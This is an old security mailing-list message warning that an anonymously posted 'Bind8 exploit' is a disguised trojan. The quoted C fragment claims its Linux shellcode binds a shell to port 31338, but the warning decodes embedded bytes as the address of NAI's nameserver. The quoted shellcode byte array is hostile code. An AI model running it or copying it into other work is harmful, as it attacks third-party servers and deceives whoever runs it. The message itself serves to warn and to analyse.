Hi,
Please beware of running code such as this. It will do it's best to attack
NAI's nameserver. It's a typical, though well disguised, shellcode trick.
Look in the Linux shellcode:
\xa1\x45\x03\x96 == 161.69.3.150 == dns1.nai.com
More details after I have a better look...
Max
At 04:12 PM 1/31/2001 -0700, you wrote:
> >From Anonymous <[EMAIL PROTECTED]> Wed Jan 31 18:06:24 2001
>Date: Thu, 31 Jan 2001 18:06:19 -0400
>From: Anonymous <[EMAIL PROTECTED]>
>To: [EMAIL PROTECTED]
>Subject: Bind8 exploit
>Message-ID: <[EMAIL PROTECTED]>
>Mime-Version: 1.0
>Content-Type: text/plain; charset="us-ascii"
>X-Mailer: Internet Mail Service (5.5.2650.21)
>
>
>/*
> * Implements TSIG buffer mismanagement overflow for incorrect
> signatures. That
> * one was really nice bug!
> * Thanks NAI for nice bug!
> */
>
>/* zeroes in all shellcodes are allowed - we encode them anyway.. */
>char linux_shellcode[] = /* modifyed Aleph1 linux shellcode to
> * bind to tcp port 31338. hey aleph1
> * :) */
>"\xeb\x34\x5e\xbb\x01\x00\x00\x00\x89\xf1\xb8\x66\x00\x00\x00\xcd"
>"\x80\x89\x46\x14\x8d\x46\x30\x89\x46\x18\x31\xc0\x89\x46\x20\x8d"
>"\x46\x0c\x89\x46\x24\xb8\x66\x00\x00\x00\xbb\x0b\x00\x00\x00\x8d"
>"\x4e\x14\xcd\x80\xeb\xef\xe8\xc7\xff\xff\xff\x02\x00\x00\x00\x02"
>"\x00\x00\x00\x11\x00\x00\x00\x02\x00\x00\x35\xa1\x45\x03\x96\xff"
>"\xff\xff\xff\xef\xff\xff\xff\x00\x04\x00\x00\x00\x00\x00\x00\x02"
>"\x5f\x9a\x80\x10\x00\x00\x00/bin/sh\0";
